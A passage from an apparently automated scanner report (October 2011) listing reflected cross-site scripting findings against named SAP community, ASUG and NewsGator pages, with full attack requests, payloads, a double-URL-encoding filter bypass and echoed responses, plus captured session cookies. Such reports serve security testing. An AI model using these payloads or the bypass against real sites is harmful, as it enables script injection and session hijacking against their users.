3.52. http://weblogs.sdn.sap.com/cs/user/create/cs_msg [x-lr2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg

Issue detail

The value of the x-lr2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e302"><script>alert(1)</script>4898dfa5535 was submitted in the x-lr2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page= HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1315

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302"><script>alert(1)</script>4898dfa5535&page=" />
...[SNIP]...

3.53. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7052c%253balert%25281%2529%252f%252f161ddd4d8be was submitted in the REST URL parameter 4. This input was echoed as 7052c;alert(1)//161ddd4d8be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C7052c%253balert%25281%2529%252f%252f161ddd4d8be/script%3E8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:18 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1306

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<7052c;alert(1)//161ddd4d8be/script>
...[SNIP]...

3.54. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcb6"><script>alert(1)</script>10d38451814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/2bcb6"><script>alert(1)</script>10d38451814/script%3E8b27daf9eeb HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:17 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1292

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="/cs/user/create/2bcb6"><script>alert(1)</script>10d38451814/script>
...[SNIP]...

3.55. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43cae%253balert%25281%2529%252f%252f4db97354d1c was submitted in the REST URL parameter 5. This input was echoed as 43cae;alert(1)//4db97354d1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/43cae%253balert%25281%2529%252f%252f4db97354d1c HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:19 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1288

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</43cae;alert(1)//4db97354d1c" />
...[SNIP]...

3.56. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f0e85<script>alert(1)</script>334b249d7a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eebf0e85<script>alert(1)</script>334b249d7a7 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:20 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1320

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>8b27daf9eebf0e85<script>alert(1)</script>334b249d7a7" />
...[SNIP]...

3.57. http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d3da<script>alert(1)</script>c5f0d095866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb?9d3da<script>alert(1)</script>c5f0d095866=1 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg66fe1%22%3E%3Cscript%3Ealert(1)%3C/script%3E8b27daf9eeb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:15 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1323

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>8b27daf9eeb?9d3da<script>alert(1)</script>c5f0d095866=1" />
...[SNIP]...

3.58. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/login

Issue detail

The value of the x-redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59301"><script>alert(1)</script>f5151cfe29d was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cs/user/login?x-redirect=59301"><script>alert(1)</script>f5151cfe29d HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302%22%3E%3Cscript%3Ealert(1)%3C/script%3E4898dfa5535&page=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:08 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1257

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
<input type="hidden" name="x-redirect" value="59301"><script>alert(1)</script>f5151cfe29d" />
...[SNIP]...

3.59. http://weblogs.sdn.sap.com/cs/user/login [x-redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /cs/user/login

Issue detail

The value of the x-redirect request parameter is copied into the HTML document as plain text between tags. The payload 85ee1<script>alert(1)</script>875fad350be was submitted in the x-redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cs/user/login?x-redirect=/cs/user/create/cs_msg%3Fx-lr=cs_disc%2F%26x-lr2=wlg%2F269171e302%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4898dfa5535%26page=85ee1<script>alert(1)</script>875fad350be HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/cs/user/create/cs_msg?x-lr=cs_disc/&x-lr2=wlg/269171e302%22%3E%3Cscript%3Ealert(1)%3C/script%3E4898dfa5535&page=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:29:08 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1356

<html>
<head>
<title>
SAP CS - Login
</title>
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.doma
...[SNIP]...
</script>4898dfa5535&page=85ee1<script>alert(1)</script>875fad350be" />
...[SNIP]...

3.60. http://www.asugonline.com/weborb.aspx [2nd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.asugonline.com
Path:   /weborb.aspx

Issue detail

The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 959bb<script>alert(1)</script>75f3445b5e2 was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /weborb.aspx HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
Content-Length: 244
Origin: http://www.asugonline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://www.asugonline.com/swfs/MainApp.swf?ver2.0.11159
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

........null../1.....    ..
..Mflex.messaging.messages.CommandMessage.timestamp.headers.operation    body.correlationId.messageId.timeToLive.clientId.destination.........
#.%DSMessagingVersion    DSId....nil..
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-amf
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:35 GMT
Content-Length: 392

......../1/onResult.......
..Uflex.messaging.messages.AcknowledgeMessage.timestamp    body.timeToLive.destination.messageId.clientId.headers.correlationId.Bs0q..P......I0553731E-0C94-4545-B5BF-7C58F43507D1.IAD29185E-71B2-4A92-9380-E717F59B83AB
#.    DSId.SESSION_TIMEOUT.I543E9256-9A42-4448-BF24-0863F9EAFBD8..Bs0...P....8FAA4598-09EC-DBAF-B0AA-07F947741977959bb<script>alert(1)</script>75f3445b5e2

3.61. http://www.newsgator.com/DesktopModules/Markit.SlideShow/CSSHandler.ashx [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /DesktopModules/Markit.SlideShow/CSSHandler.ashx

